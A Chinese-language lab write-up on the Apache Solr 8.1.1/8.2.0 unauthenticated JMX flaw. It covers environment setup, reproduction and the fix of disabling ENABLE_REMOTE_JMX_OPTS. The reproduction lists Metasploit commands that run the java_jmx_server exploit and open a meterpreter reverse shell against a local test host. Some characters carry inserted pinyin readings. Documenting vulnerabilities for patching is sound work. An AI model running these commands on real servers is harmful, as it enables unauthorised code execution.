ps:Apache Solr8.2.0下載有點(diǎn)慢,需要的話評論加好友我私發(fā)你
0X00漏洞簡介
該漏洞源于默認(rèn)配置文件solr.in.sh中的ENABLE_REMOTE_JMX_OPTS配置選項(xiàng)存在安全風(fēng)險(xiǎn)。
Apache Solr的8.1.1和8.2.0版本的自帶配置文件solr.in.sh中存在ENABLE_REMOTE_JMX_OPTS="true"選項(xiàng)。
如果使用受影響版本中的默認(rèn)solr.in.sh文件,那么將啟用JMX監(jiān)視并將其暴露在RMI_PORT上(默認(rèn)值= 18983),
并且無需進(jìn)行任何身份驗(yàn)證。
如果防火墻中的入站流量打開了此端口,則具有Solr節(jié)點(diǎn)網(wǎng)絡(luò)訪問權(quán)限的任何人都將能夠訪問JMX,
并且可以上傳惡意代碼在Solr服務(wù)器上執(zhí)行。該漏洞不影響Windows系統(tǒng)的用戶,僅影響部分版本的Linux用戶。
0X01漏洞影響范圍
Apache Solr8.1.1和8.2.0版本且不影響Windows系統(tǒng)用戶
0X02漏洞危害
如果受害者使用了該默認(rèn)配置,則會(huì)在默認(rèn)端口18983開放JMX服務(wù),且默認(rèn)未開啟認(rèn)證。任何可訪問此端口的攻擊者可利用此漏洞向受影響服務(wù)發(fā)起攻擊,執(zhí)行任意代碼。
0X03漏洞環(huán)境搭建
1.首先下載含有漏洞的Apache Solr版本
這里提供一個(gè)可以下載任意版本Apache Solr的網(wǎng)址
http://archive.apache.org/dist/lucene/solr
linux下可以通過命令wegt http://archive.apache.org/dist/lucene/solr/8.2.0/solr-8.2.0.zip
來下載
或者可以windows下載好后通過xftp等軟件傳到linux
2.下載好后用 unzip solr-8.2.0.zip來講該文件進(jìn)行解壓
解壓完成后進(jìn)入該文件夾的bin目錄下
查看solr.in.sh文件發(fā)現(xiàn)ENABLE_REMOTE_JMX_OPTS="true"選項(xiàng)開啟
在bin目錄下執(zhí)行命令
./solr start -force
來啟動(dòng)solr服務(wù)
訪問ip加8983端口
得到該界面則環(huán)境搭建成功
0X04漏洞復(fù)現(xiàn)
使用尖刀端口掃描后發(fā)現(xiàn)18983端口開啟
我們可以用MSF中的exploit/multi/misc/java_jmx_server模塊進(jìn)行漏洞復(fù)現(xiàn)。(因?yàn)槲矣胟ali搭建漏洞環(huán)境,使用127.0.0.1本地地址作為攻擊目標(biāo))
開啟msf執(zhí)行如下命令
use exploit/multi/misc/java_jmx_server
set RHOST 127.0.0.1
set RPORT 18983
set payload java/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 4444
執(zhí)行完成,發(fā)現(xiàn)成功建立連接
0X05漏洞修復(fù)
將solr.in.sh配置文件中的ENABLE_REMOTE_JMX_OPTS選項(xiàng)設(shè)置為false,然后重啟Solr服務(wù)。
聯(lián)系客服